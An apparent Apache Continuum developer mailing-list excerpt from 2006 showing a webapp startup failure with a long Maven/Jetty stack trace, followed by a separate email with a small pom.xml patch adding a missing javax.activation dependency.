X-Virus-Checked: Checked by ClamAV on apache.org okies, I tried running the webapp this evening to muck around with Notifier validations further, but looks like something is broken with the webapp startup. I have attached the debug output below. Any ideas? I am guessing recent updates to application.xml may have caused this. Appreciate any help. Cheers, Rahul ----------------------------------------------------- 2006-11-09 19:36:39.acf:4db6:5e0b:f386:43a5:35d7:718d:3c8bWARN: failed ContextHandler@126c06b{/,file:/E:/continuum/continuum-webapp/src/main/webapp/} 2006-11-09 19:36:39.acf:4db6:5e0b:f386:43a5:35d7:718d:3c8bWARN: failed ContextHandlerCollection@122e8c9 2006-11-09 19:36:39.acf:4db6:5e0b:f386:43a5:35d7:718d:3c8bWARN: failed HandlerCollection@e0e9d5 2006-11-09 19:36:40.acf:4db6:5e0b:f386:43a5:35d7:718d:3c8bINFO: Started SelectChannelConnector @ 161.129.204.104:9090 2006-11-09 19:36:40.acf:4db6:5e0b:f386:43a5:35d7:718d:3c8bWARN: failed Server@108bef4 [INFO] Jetty server exiting. [INFO] ------------------------------------------------------------------------ [ERROR] BUILD ERROR [INFO] ------------------------------------------------------------------------ [INFO] Failure Embedded error: org.codehaus.plexus.PlexusContainerException: Error initializaing container in org.codehaus.plexus.container.initialization.StartLoadOnStartCompo [email protected]. org.codehaus.plexus.mailsender.javamail.JavamailMailSender [INFO] ------------------------------------------------------------------------ [DEBUG] Trace org.apache.maven.lifecycle.LifecycleExecutionException: Failure at org.apache.maven.lifecycle.DefaultLifecycleExecutor.executeGoals(DefaultLifecycleExecutor.java:559) at org.apache.maven.lifecycle.DefaultLifecycleExecutor.executeStandaloneGoal(DefaultLifecycleExecutor.java:488) at org.apache.maven.lifecycle.DefaultLifecycleExecutor.executeGoal(DefaultLifecycleExecutor.java:458) at org.apache.maven.lifecycle.DefaultLifecycleExecutor.executeGoalAndHandleFailures(DefaultLifecycleExecutor.java:306) at org.apache.maven.lifecycle.DefaultLifecycleExecutor.executeTaskSegments(DefaultLifecycleExecutor.java:273) at org.apache.maven.lifecycle.DefaultLifecycleExecutor.execute(DefaultLifecycleExecutor.java:140) at org.apache.maven.DefaultMaven.doExecute(DefaultMaven.java:322) at org.apache.maven.DefaultMaven.execute(DefaultMaven.java:115) at org.apache.maven.cli.MavenCli.main(MavenCli.java:256) at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:39) at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25) at java.lang.reflect.Method.invoke(Method.java:597) at org.codehaus.classworlds.Launcher.launchEnhanced(Launcher.java:315) at org.codehaus.classworlds.Launcher.launch(Launcher.java:255) at org.codehaus.classworlds.Launcher.mainWithExitCode(Launcher.java:430) at org.codehaus.classworlds.Launcher.main(Launcher.java:375) Caused by: org.apache.maven.plugin.MojoExecutionException: Failure at org.mortbay.jetty.plugin.AbstractJettyMojo.startJetty(AbstractJettyMojo.java:340) at org.mortbay.jetty.plugin.AbstractJettyMojo.execute(AbstractJettyMojo.java:272) at org.mortbay.jetty.plugin.AbstractJettyRunMojo.execute(AbstractJettyRunMojo.java:177) at org.mortbay.jetty.plugin.Jetty6RunMojo.execute(Jetty6RunMojo.java:183) at org.apache.maven.plugin.DefaultPluginManager.executeMojo(DefaultPluginManager.java:412) at org.apache.maven.lifecycle.DefaultLifecycleExecutor.executeGoals(DefaultLifecycleExecutor.java:534) ... 16 more Caused by: java.lang.RuntimeException: org.codehaus.plexus.PlexusContainerException: Error initializaing container in org.codehaus.plexus.container.initializatio [email protected]. at org.codehaus.plexus.xwork.PlexusLifecycleListener.contextInitialized(PlexusLifecycleListener.java:65) at org.mortbay.jetty.handler.ContextHandler.startContext(ContextHandler.java:450) at org.mortbay.jetty.webapp.WebAppContext.startContext(WebAppContext.java:1129) at org.mortbay.jetty.handler.ContextHandler.doStart(ContextHandler.java:420) at org.mortbay.jetty.webapp.WebAppContext.doStart(WebAppContext.java:457) at org.mortbay.component.AbstractLifeCycle.start(AbstractLifeCycle.java:38) at org.mortbay.jetty.handler.HandlerCollection.doStart(HandlerCollection.java:156) at org.mortbay.jetty.handler.ContextHandlerCollection.doStart(ContextHandlerCollection.java:120) at org.mortbay.component.AbstractLifeCycle.start(AbstractLifeCycle.java:38) at org.mortbay.jetty.handler.HandlerCollection.doStart(HandlerCollection.java:156) at org.mortbay.component.AbstractLifeCycle.start(AbstractLifeCycle.java:38) at org.mortbay.jetty.handler.HandlerWrapper.doStart(HandlerWrapper.java:119) at org.mortbay.jetty.Server.doStart(Server.java:210) at org.mortbay.component.AbstractLifeCycle.start(AbstractLifeCycle.java:38) at org.mortbay.jetty.plugin.Jetty6PluginServer.start(Jetty6PluginServer.java:134) at org.mortbay.jetty.plugin.AbstractJettyMojo.startJetty(AbstractJettyMojo.java:327) ... 21 more Caused by: org.codehaus.plexus.PlexusContainerException: Error initializaing container in org.codehaus.plexus.container.initialization.StartLoadOnStartComponents [email protected]. at org.codehaus.plexus.DefaultPlexusContainer.initializePhases(DefaultPlexusContainer.java:614) at org.codehaus.plexus.DefaultPlexusContainer.initialize(DefaultPlexusContainer.java:564) at org.codehaus.plexus.DefaultPlexusContainer.<init>(DefaultPlexusContainer.java:235) at org.codehaus.plexus.DefaultPlexusContainer.<init>(DefaultPlexusContainer.java:197) at org.codehaus.plexus.xwork.PlexusLifecycleListener.contextInitialized(PlexusLifecycleListener.java:59) ... 36 more Caused by: org.codehaus.plexus.container.initialization.ContainerInitializationException: Error looking up load-on-start component. at org.codehaus.plexus.container.initialization.StartLoadOnStartComponentsPhase.execute(StartLoadOnStartComponentsPhase.java:57) at org.codehaus.plexus.DefaultPlexusContainer.initializePhases(DefaultPlexusContainer.java:610) ... 40 more Caused by: org.codehaus.plexus.component.repository.exception.ComponentLookupException: Unable to lookup component 'org.codehaus.plexus.taskqueue.execution.TaskQ ueueExecutorbuild-project', it could not be started at org.codehaus.plexus.DefaultComponentLookupManager.lookup(DefaultComponentLookupManager.java:86) at org.codehaus.plexus.DefaultComponentLookupManager.lookup(DefaultComponentLookupManager.java:191) at org.codehaus.plexus.DefaultPlexusContainer.lookup(DefaultPlexusContainer.java:265) at org.codehaus.plexus.container.initialization.StartLoadOnStartComponentsPhase.execute(StartLoadOnStartComponentsPhase.java:52) ... 41 more Caused by: org.codehaus.plexus.component.repository.exception.ComponentLifecycleException: Error starting component at org.codehaus.plexus.component.manager.AbstractComponentManager.startComponentLifecycle(AbstractComponentManager.java:114) at org.codehaus.plexus.component.manager.AbstractComponentManager.createComponentInstance(AbstractComponentManager.java:100) at org.codehaus.plexus.component.manager.ClassicSingletonComponentManager.getComponent(ClassicSingletonComponentManager.java:92) at org.codehaus.plexus.DefaultComponentLookupManager.lookup(DefaultComponentLookupManager.java:77) ... 44 more Caused by: org.codehaus.plexus.personality.plexus.lifecycle.phase.PhaseExecutionException: Error composing component at org.codehaus.plexus.personality.plexus.lifecycle.phase.CompositionPhase.execute(CompositionPhase.java:35) at org.codehaus.plexus.lifecycle.AbstractLifecycleHandler.start(AbstractLifecycleHandler.java:102) at org.codehaus.plexus.component.manager.AbstractComponentManager.startComponentLifecycle(AbstractComponentManager.java:110) ... 47 more Caused by: org.codehaus.plexus.component.composition.CompositionException: Composition failed of field null in object of type org.codehaus.plexus.taskqueue.execu tion.ThreadedTaskQueueExecutor because the requirement ComponentRequirement{role='org.codehaus.plexus.taskqueue.execution.TaskExecutor', roleHint='build-project' , fieldName='null'} was missing at org.codehaus.plexus.component.composition.CompositionUtils.findRequirement(CompositionUtils.java:100) at org.codehaus.plexus.component.composition.FieldComponentComposer.assignRequirementToField(FieldComponentComposer.java:70) at org.codehaus.plexus.component.composition.FieldComponentComposer.assignRequirement(FieldComponentComposer.java:61) at org.codehaus.plexus.component.composition.AbstractComponentComposer.assembleComponent(AbstractComponentComposer.java:103) at org.codehaus.plexus.component.composition.DefaultComponentComposerManager.assembleComponent(DefaultComponentComposerManager.java:70) at org.codehaus.plexus.personality.plexus.lifecycle.phase.CompositionPhase.execute(CompositionPhase.java:31) ... 49 more Caused by: org.codehaus.plexus.component.repository.exception.ComponentLookupException: Unable to lookup component 'org.codehaus.plexus.taskqueue.execution.TaskE xecutorbuild-project', it could not be started at org.codehaus.plexus.DefaultComponentLookupManager.lookup(DefaultComponentLookupManager.java:86) at org.codehaus.plexus.DefaultPlexusContainer.lookup(DefaultPlexusContainer.java:247) at org.codehaus.plexus.component.composition.CompositionUtils.findRequirement(CompositionUtils.java:87) ... 54 more Caused by: org.codehaus.plexus.component.repository.exception.ComponentLifecycleException: Error starting component at org.codehaus.plexus.component.manager.AbstractComponentManager.startComponentLifecycle(AbstractComponentManager.java:114) at org.codehaus.plexus.component.manager.AbstractComponentManager.createComponentInstance(AbstractComponentManager.java:100) at org.codehaus.plexus.component.manager.ClassicSingletonComponentManager.getComponent(ClassicSingletonComponentManager.java:92) at org.codehaus.plexus.DefaultComponentLookupManager.lookup(DefaultComponentLookupManager.java:77) ... 56 more Caused by: org.codehaus.plexus.personality.plexus.lifecycle.phase.PhaseExecutionException: Error composing component at org.codehaus.plexus.personality.plexus.lifecycle.phase.CompositionPhase.execute(CompositionPhase.java:35) at org.codehaus.plexus.lifecycle.AbstractLifecycleHandler.start(AbstractLifecycleHandler.java:102) at org.codehaus.plexus.component.manager.AbstractComponentManager.startComponentLifecycle(AbstractComponentManager.java:110) ... 59 more Caused by: org.codehaus.plexus.component.composition.CompositionException: Composition failed of field null in object of type org.apache.maven.continuum.buildcon troller.BuildProjectTaskExecutor because the requirement ComponentRequirement{role='org.apache.maven.continuum.buildcontroller.BuildController', roleHint='null', fieldName='null'} was missing at org.codehaus.plexus.component.composition.CompositionUtils.findRequirement(CompositionUtils.java:100) at org.codehaus.plexus.component.composition.FieldComponentComposer.assignRequirementToField(FieldComponentComposer.java:70) at org.codehaus.plexus.component.composition.FieldComponentComposer.assignRequirement(FieldComponentComposer.java:61) at org.codehaus.plexus.component.composition.AbstractComponentComposer.assembleComponent(AbstractComponentComposer.java:103) at org.codehaus.plexus.component.composition.DefaultComponentComposerManager.assembleComponent(DefaultComponentComposerManager.java:70) at org.codehaus.plexus.personality.plexus.lifecycle.phase.CompositionPhase.execute(CompositionPhase.java:31) ... 61 more Caused by: org.codehaus.plexus.component.repository.exception.ComponentLookupException: Unable to lookup component 'org.apache.maven.continuum.buildcontroller.Bu ildController', it could not be started at org.codehaus.plexus.DefaultComponentLookupManager.lookup(DefaultComponentLookupManager.java:86) at org.codehaus.plexus.DefaultPlexusContainer.lookup(DefaultPlexusContainer.java:247) at org.codehaus.plexus.component.composition.CompositionUtils.findRequirement(CompositionUtils.java:87) ... 66 more Caused by: org.codehaus.plexus.component.repository.exception.ComponentLifecycleException: Error starting component at org.codehaus.plexus.component.manager.AbstractComponentManager.startComponentLifecycle(AbstractComponentManager.java:114) at org.codehaus.plexus.component.manager.AbstractComponentManager.createComponentInstance(AbstractComponentManager.java:100) at org.codehaus.plexus.component.manager.ClassicSingletonComponentManager.getComponent(ClassicSingletonComponentManager.java:92) at org.codehaus.plexus.DefaultComponentLookupManager.lookup(DefaultComponentLookupManager.java:77) ... 68 more Caused by: org.codehaus.plexus.personality.plexus.lifecycle.phase.PhaseExecutionException: Error composing component at org.codehaus.plexus.personality.plexus.lifecycle.phase.CompositionPhase.execute(CompositionPhase.java:35) at org.codehaus.plexus.lifecycle.AbstractLifecycleHandler.start(AbstractLifecycleHandler.java:102) at org.codehaus.plexus.component.manager.AbstractComponentManager.startComponentLifecycle(AbstractComponentManager.java:110) ... 71 more Caused by: org.codehaus.plexus.component.composition.CompositionException: Composition failed of field null in object of type org.apache.maven.continuum.buildcon troller.DefaultBuildController because the requirement ComponentRequirement{role='org.apache.maven.continuum.notification.ContinuumNotificationDispatcher', roleH int='null', fieldName='null'} was missing at org.codehaus.plexus.component.composition.CompositionUtils.findRequirement(CompositionUtils.java:100) at org.codehaus.plexus.component.composition.FieldComponentComposer.assignRequirementToField(FieldComponentComposer.java:70) at org.codehaus.plexus.component.composition.FieldComponentComposer.assignRequirement(FieldComponentComposer.java:61) at org.codehaus.plexus.component.composition.AbstractComponentComposer.assembleComponent(AbstractComponentComposer.java:103) at org.codehaus.plexus.component.composition.DefaultComponentComposerManager.assembleComponent(DefaultComponentComposerManager.java:70) at org.codehaus.plexus.personality.plexus.lifecycle.phase.CompositionPhase.execute(CompositionPhase.java:31) ... 73 more Caused by: org.codehaus.plexus.component.repository.exception.ComponentLookupException: Unable to lookup component 'org.apache.maven.continuum.notification.Conti nuumNotificationDispatcher', it could not be started at org.codehaus.plexus.DefaultComponentLookupManager.lookup(DefaultComponentLookupManager.java:86) at org.codehaus.plexus.DefaultPlexusContainer.lookup(DefaultPlexusContainer.java:247) at org.codehaus.plexus.component.composition.CompositionUtils.findRequirement(CompositionUtils.java:87) ... 78 more Caused by: org.codehaus.plexus.component.repository.exception.ComponentLifecycleException: Error starting component at org.codehaus.plexus.component.manager.AbstractComponentManager.startComponentLifecycle(AbstractComponentManager.java:114) at org.codehaus.plexus.component.manager.AbstractComponentManager.createComponentInstance(AbstractComponentManager.java:100) at org.codehaus.plexus.component.manager.ClassicSingletonComponentManager.getComponent(ClassicSingletonComponentManager.java:92) at org.codehaus.plexus.DefaultComponentLookupManager.lookup(DefaultComponentLookupManager.java:77) ... 80 more Caused by: org.codehaus.plexus.personality.plexus.lifecycle.phase.PhaseExecutionException: Error composing component at org.codehaus.plexus.personality.plexus.lifecycle.phase.CompositionPhase.execute(CompositionPhase.java:35) at org.codehaus.plexus.lifecycle.AbstractLifecycleHandler.start(AbstractLifecycleHandler.java:102) at org.codehaus.plexus.component.manager.AbstractComponentManager.startComponentLifecycle(AbstractComponentManager.java:110) ... 83 more Caused by: org.codehaus.plexus.component.composition.CompositionException: Composition failed of field null in object of type org.apache.maven.continuum.notifica tion.DefaultContinuumNotificationDispatcher because the requirement ComponentRequirement{role='org.codehaus.plexus.notification.notifier.manager.NotifierManager' , roleHint='null', fieldName='null'} was missing at org.codehaus.plexus.component.composition.CompositionUtils.findRequirement(CompositionUtils.java:100) at org.codehaus.plexus.component.composition.FieldComponentComposer.assignRequirementToField(FieldComponentComposer.java:70) at org.codehaus.plexus.component.composition.FieldComponentComposer.assignRequirement(FieldComponentComposer.java:61) at org.codehaus.plexus.component.composition.AbstractComponentComposer.assembleComponent(AbstractComponentComposer.java:103) at org.codehaus.plexus.component.composition.DefaultComponentComposerManager.assembleComponent(DefaultComponentComposerManager.java:70) at org.codehaus.plexus.personality.plexus.lifecycle.phase.CompositionPhase.execute(CompositionPhase.java:31) ... 85 more Caused by: org.codehaus.plexus.component.repository.exception.ComponentLookupException: Unable to lookup component 'org.codehaus.plexus.notification.notifier.man ager.NotifierManager', it could not be started at org.codehaus.plexus.DefaultComponentLookupManager.lookup(DefaultComponentLookupManager.java:86) at org.codehaus.plexus.DefaultPlexusContainer.lookup(DefaultPlexusContainer.java:247) at org.codehaus.plexus.component.composition.CompositionUtils.findRequirement(CompositionUtils.java:87) ... 90 more Caused by: org.codehaus.plexus.component.repository.exception.ComponentLifecycleException: Error starting component at org.codehaus.plexus.component.manager.AbstractComponentManager.startComponentLifecycle(AbstractComponentManager.java:114) at org.codehaus.plexus.component.manager.AbstractComponentManager.createComponentInstance(AbstractComponentManager.java:100) at org.codehaus.plexus.component.manager.ClassicSingletonComponentManager.getComponent(ClassicSingletonComponentManager.java:92) at org.codehaus.plexus.DefaultComponentLookupManager.lookup(DefaultComponentLookupManager.java:77) ... 92 more Caused by: org.codehaus.plexus.personality.plexus.lifecycle.phase.PhaseExecutionException: Error composing component at org.codehaus.plexus.personality.plexus.lifecycle.phase.CompositionPhase.execute(CompositionPhase.java:35) at org.codehaus.plexus.lifecycle.AbstractLifecycleHandler.start(AbstractLifecycleHandler.java:102) at org.codehaus.plexus.component.manager.AbstractComponentManager.startComponentLifecycle(AbstractComponentManager.java:110) ... 95 more Caused by: org.codehaus.plexus.component.composition.CompositionException: Composition failed of field notifiers in object of type org.codehaus.plexus.notificati on.notifier.manager.DefaultNotifierManager because the requirement ComponentRequirement{role='org.codehaus.plexus.notification.notifier.Notifier', roleHint='null ', fieldName='notifiers'} was missing at org.codehaus.plexus.component.composition.CompositionUtils.findRequirement(CompositionUtils.java:100) at org.codehaus.plexus.component.composition.FieldComponentComposer.assignRequirementToField(FieldComponentComposer.java:70) at org.codehaus.plexus.component.composition.FieldComponentComposer.assignRequirement(FieldComponentComposer.java:61) at org.codehaus.plexus.component.composition.AbstractComponentComposer.assembleComponent(AbstractComponentComposer.java:103) at org.codehaus.plexus.component.composition.DefaultComponentComposerManager.assembleComponent(DefaultComponentComposerManager.java:70) at org.codehaus.plexus.personality.plexus.lifecycle.phase.CompositionPhase.execute(CompositionPhase.java:31) ... 97 more Caused by: org.codehaus.plexus.component.repository.exception.ComponentLookupException: Unable to lookup component 'org.codehaus.plexus.notification.notifier.Not ifiermail', it could not be started at org.codehaus.plexus.DefaultComponentLookupManager.lookup(DefaultComponentLookupManager.java:86) at org.codehaus.plexus.DefaultComponentLookupManager.lookup(DefaultComponentLookupManager.java:191) at org.codehaus.plexus.DefaultComponentLookupManager.lookupMap(DefaultComponentLookupManager.java:140) at org.codehaus.plexus.DefaultPlexusContainer.lookupMap(DefaultPlexusContainer.java:253) at org.codehaus.plexus.component.composition.CompositionUtils.findRequirement(CompositionUtils.java:67) ... 102 more Caused by: org.codehaus.plexus.component.repository.exception.ComponentLifecycleException: Error starting component at org.codehaus.plexus.component.manager.AbstractComponentManager.startComponentLifecycle(AbstractComponentManager.java:114) at org.codehaus.plexus.component.manager.AbstractComponentManager.createComponentInstance(AbstractComponentManager.java:100) at org.codehaus.plexus.component.manager.ClassicSingletonComponentManager.getComponent(ClassicSingletonComponentManager.java:92) at org.codehaus.plexus.DefaultComponentLookupManager.lookup(DefaultComponentLookupManager.java:77) ... 106 more Caused by: org.codehaus.plexus.personality.plexus.lifecycle.phase.PhaseExecutionException: Error composing component at org.codehaus.plexus.personality.plexus.lifecycle.phase.CompositionPhase.execute(CompositionPhase.java:35) at org.codehaus.plexus.lifecycle.AbstractLifecycleHandler.start(AbstractLifecycleHandler.java:102) at org.codehaus.plexus.component.manager.AbstractComponentManager.startComponentLifecycle(AbstractComponentManager.java:110) ... 109 more Caused by: org.codehaus.plexus.component.composition.CompositionException: Composition failed of field null in object of type org.apache.maven.continuum.notifica tion.mail.MailContinuumNotifier because the requirement ComponentRequirement{role='org.codehaus.plexus.mailsender.MailSender', roleHint='null', fieldName='null'} was missing at org.codehaus.plexus.component.composition.CompositionUtils.findRequirement(CompositionUtils.java:100) at org.codehaus.plexus.component.composition.FieldComponentComposer.assignRequirementToField(FieldComponentComposer.java:70) at org.codehaus.plexus.component.composition.FieldComponentComposer.assignRequirement(FieldComponentComposer.java:61) at org.codehaus.plexus.component.composition.AbstractComponentComposer.assembleComponent(AbstractComponentComposer.java:103) at org.codehaus.plexus.component.composition.DefaultComponentComposerManager.assembleComponent(DefaultComponentComposerManager.java:70) at org.codehaus.plexus.personality.plexus.lifecycle.phase.CompositionPhase.execute(CompositionPhase.java:31) ... 111 more Caused by: org.codehaus.plexus.component.repository.exception.ComponentLookupException: Unable to lookup component 'org.codehaus.plexus.mailsender.MailSender', i t could not be created at org.codehaus.plexus.DefaultComponentLookupManager.lookup(DefaultComponentLookupManager.java:81) at org.codehaus.plexus.DefaultPlexusContainer.lookup(DefaultPlexusContainer.java:247) at org.codehaus.plexus.component.composition.CompositionUtils.findRequirement(CompositionUtils.java:87) ... 116 more Caused by: org.codehaus.plexus.component.factory.ComponentInstantiationException: Could not instanciate component: role: 'org.codehaus.plexus.mailsender.MailSend er', implementation: 'org.codehaus.plexus.mailsender.javamail.JavamailMailSender' at org.codehaus.plexus.component.factory.java.JavaComponentFactory.makeException(JavaComponentFactory.java:77) at org.codehaus.plexus.component.factory.java.JavaComponentFactory.newInstance(JavaComponentFactory.java:54) at org.codehaus.plexus.component.manager.AbstractComponentManager.createComponentInstance(AbstractComponentManager.java:187) at org.codehaus.plexus.component.manager.AbstractComponentManager.createComponentInstance(AbstractComponentManager.java:98) at org.codehaus.plexus.component.manager.ClassicSingletonComponentManager.getComponent(ClassicSingletonComponentManager.java:92) at org.codehaus.plexus.DefaultComponentLookupManager.lookup(DefaultComponentLookupManager.java:77) ... 118 more Caused by: java.lang.ClassNotFoundException: org.codehaus.plexus.mailsender.javamail.JavamailMailSender at java.net.URLClassLoader$1.run(URLClassLoader.java:200) at java.security.AccessController.doPrivileged(Native Method) at java.net.URLClassLoader.findClass(URLClassLoader.java:188) at java.lang.ClassLoader.loadClass(ClassLoader.java:306) at org.codehaus.classworlds.RealmClassLoader.loadClassDirect(RealmClassLoader.java:195) at org.codehaus.classworlds.DefaultClassRealm.loadClass(DefaultClassRealm.java:255) at org.codehaus.plexus.component.factory.java.JavaComponentFactory.newInstance(JavaComponentFactory.java:30) ... 122 more [INFO] ------------------------------------------------------------------------ [INFO] Total time: 1 minute [INFO] Finished at: Thu Nov 09 19:36:40 NZDT 2006 [INFO] Final Memory: 33M/61M [INFO] ------------------------------------------------------------------------ 2006-11-09 19:36:40,484 [Thread-2] INFO - Stopping Continuum. 2006-11-09 19:36:40,484 [Thread-2] INFO - Continuum stopped. 2006-11-09 19:36:40.acf:4db6:5e0b:f386:43a5:35d7:718d:3c8bINFO: Shutdown hook executing 2006-11-09 19:36:40.acf:4db6:5e0b:f386:43a5:35d7:718d:3c8bINFO: Shutdown hook complete From [email protected] Thu Nov 09 15:15:18 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 91890 invoked from network); 9 Nov 2006 15:15:17 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 9 Nov 2006 15:15:17 -0000 Received: (qmail 9575 invoked by uid 500); 9 Nov 2006 15:15:28 -0000 Delivered-To: [email protected] Received: (qmail 9553 invoked by uid 500); 9 Nov 2006 15:15:27 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <continuum-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 9542 invoked by uid 99); 9 Nov 2006 15:15:27 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 09 Nov 2006 07:15:27 -0800 X-ASF-Spam-Status: No, hits=3.2 required=10.0 tests=RCVD_IN_BL_SPAMCOP_NET,RCVD_IN_SORBS_WEB,SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO chandler.sharp.fm) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 09 Nov 2006 07:15:13 -0800 Received: from chandler.sharp.fm (localhost [161.129.204.104]) by chandler.sharp.fm (Postfix) with ESMTP id D3FF1E5CC5 for <[email protected]>; Thu, 9 Nov 2006 09:14:46 -0600 (CST) Received: from [161.129.204.104] (mtngprs7.mtn.co.za [161.129.204.104]) (using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits)) (Client did not present a certificate) by chandler.sharp.fm (Postfix) with ESMTP id 880AFE54F5 for <[email protected]>; Thu, 9 Nov 2006 09:14:40 -0600 (CST) Message-ID: <[email protected]> Date: Thu, 09 Nov 2006 17:14:25 +0200 From: Graham Leggett <[email protected]> User-Agent: Thunderbird 161.129.204.104 (Macintosh/20061025) MIME-Version: 1.0 To: [email protected] Subject: [Patch] Missing dependency in continuum-trunk Content-Type: multipart/signed; protocol="application/x-pkcs7-signature"; micalg=sha1; boundary="------------ms090502010206010308090400" X-Virus-Scanned: ClamAV using ClamSMTP X-Virus-Checked: Checked by ClamAV on apache.org --------------ms090502010206010308090400 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Hi all, There is a missing dependency on activation.jar within continuum-war. The following patch fixes it. Index: continuum-webapp/pom.xml =================================================================== --- continuum-webapp/pom.xml (revision 472890) +++ continuum-webapp/pom.xml (working copy) @@ -200,6 +200,12 @@ <version>1.0-alpha-2</version> </dependency> <dependency> + <groupId>javax.activation</groupId> + <artifactId>activation</artifactId> + <version>1.1</version> + <scope>provided</scope> + </dependency> + <dependency> <groupId>javax.servlet</groupId> <artifactId>servlet-api</artifactId> <version>2.4</version> Regards, Graham -- --------------ms090502010206010308090400 Content-Type: application/x-pkcs7-signature; name="smime.p7s" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="smime.p7s" Content-Description: S/MIME Cryptographic Signature MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAQAAoIIJNTCC AvUwggJeoAMCAQICEHPerLP+yWp/U+jCFAQ0kGwwDQYJKoZIhvcNAQEFBQAwYjELMAkGA1UE BhMCWkExJTAjBgNVBAoTHFRoYXd0ZSBDb25zdWx0aW5nIChQdHkpIEx0ZC4xLDAqBgNVBAMT I1RoYXd0ZSBQZXJzb25hbCBGcmVlbWFpbCBJc3N1aW5nIENBMB4XDTA2MDkyNzA5MDgxMloX DTA3MDkyNzA5MDgxMlowXTEQMA4GA1UEBBMHTGVnZ2V0dDEPMA0GA1UEKhMGR3JhaGFtMRcw FQYDVQQDEw5HcmFoYW0gTGVnZ2V0dDEfMB0GCSqGSIb3DQEJARYQbWluZnJpbkBzaGFycC5m bTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMJQ9lruxyjmdilORMEwQnd+ZdrC XSh5TZ/Tn/KQwFsH1ZYivHBF/lRFuy/X6AGq9EKmFI0kORoqZeatkEAZ5ocajDFxa7I8o8yk DRJUJT9Iw0eCD4omrt4Ua+xsegLvVT2Neq0txvijDLuVsheVMi4l4+g3W2C1yPHgobZ3eIno wyVyrTbPUbsSmilNpkjEEJOr0qnTEbf4FX8Qapd9Jm59vPfcqooKdiY9uDPp00nwbb1xFDtN oQikIAihFVX+EzAbhR78AGPPbDyxn9uExjfOQT46JsCaZu54VI91YLF8EgQTD8DyWe7ZiMfw jqP2Ro1ALmS+VLFOU4LNfFbzaVUCAwEAAaMtMCswGwYDVR0RBBQwEoEQbWluZnJpbkBzaGFy cC5mbTAMBgNVHRMBAf8EAjAAMA0GCSqGSIb3DQEBBQUAA4GBALHl5riB6yi4w7SD9AWr7FJq AKQ5ICk/A3xRr3l+ZHw5ZLO2uFMgT2ZKiORLAkhsqVjGhsEZgXG1BEc/Pk9B3mCYYu6nyB0n rRUzR7RVeOkOVqG8qBhZ4z/ItQAxHLk30g7S7QNbuTCeWqVVXxcaXmeBvC67s/OQICyRIFRg aKtJMIIC9TCCAl6gAwIBAgIQc96ss/7Jan9T6MIUBDSQbDANBgkqhkiG9w0BAQUFADBiMQsw CQYDVQQGEwJaQTElMCMGA1UEChMcVGhhd3RlIENvbnN1bHRpbmcgKFB0eSkgTHRkLjEsMCoG A1UEAxMjVGhhd3RlIFBlcnNvbmFsIEZyZWVtYWlsIElzc3VpbmcgQ0EwHhcNMDYwOTI3MDkw ODEyWhcNMDcwOTI3MDkwODEyWjBdMRAwDgYDVQQEEwdMZWdnZXR0MQ8wDQYDVQQqEwZHcmFo YW0xFzAVBgNVBAMTDkdyYWhhbSBMZWdnZXR0MR8wHQYJKoZIhvcNAQkBFhBtaW5mcmluQHNo YXJwLmZtMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwlD2Wu7HKOZ2KU5EwTBC d35l2sJdKHlNn9Of8pDAWwfVliK8cEX+VEW7L9foAar0QqYUjSQ5Gipl5q2QQBnmhxqMMXFr sjyjzKQNElQlP0jDR4IPiiau3hRr7Gx6Au9VPY16rS3G+KMMu5WyF5UyLiXj6DdbYLXI8eCh tnd4iejDJXKtNs9RuxKaKU2mSMQQk6vSqdMRt/gVfxBql30mbn2899yqigp2Jj24M+nTSfBt vXEUO02hCKQgCKEVVf4TMBuFHvwAY89sPLGf24TGN85BPjomwJpm7nhUj3VgsXwSBBMPwPJZ 7tmIx/COo/ZGjUAuZL5UsU5Tgs18VvNpVQIDAQABoy0wKzAbBgNVHREEFDASgRBtaW5mcmlu QHNoYXJwLmZtMAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQEFBQADgYEAseXmuIHrKLjDtIP0 BavsUmoApDkgKT8DfFGveX5kfDlks7a4UyBPZkqI5EsCSGypWMaGwRmBcbUERz8+T0HeYJhi 7qfIHSetFTNHtFV46Q5WobyoGFnjP8i1ADEcuTfSDtLtA1u5MJ5apVVfFxpeZ4G8Lruz85Ag LJEgVGBoq0kwggM/MIICqKADAgECAgENMA0GCSqGSIb3DQEBBQUAMIHRMQswCQYDVQQGEwJa QTEVMBMGA1UECBMMV2VzdGVybiBDYXBlMRIwEAYDVQQHEwlDYXBlIFRvd24xGjAYBgNVBAoT EVRoYXd0ZSBDb25zdWx0aW5nMSgwJgYDVQQLEx9DZXJ0aWZpY2F0aW9uIFNlcnZpY2VzIERp dmlzaW9uMSQwIgYDVQQDExtUaGF3dGUgUGVyc29uYWwgRnJlZW1haWwgQ0ExKzApBgkqhkiG 9w0BCQEWHHBlcnNvbmFsLWZyZWVtYWlsQHRoYXd0ZS5jb20wHhcNMDMwNzE3MDAwMDAwWhcN MTMwNzE2MjM1OTU5WjBiMQswCQYDVQQGEwJaQTElMCMGA1UEChMcVGhhd3RlIENvbnN1bHRp 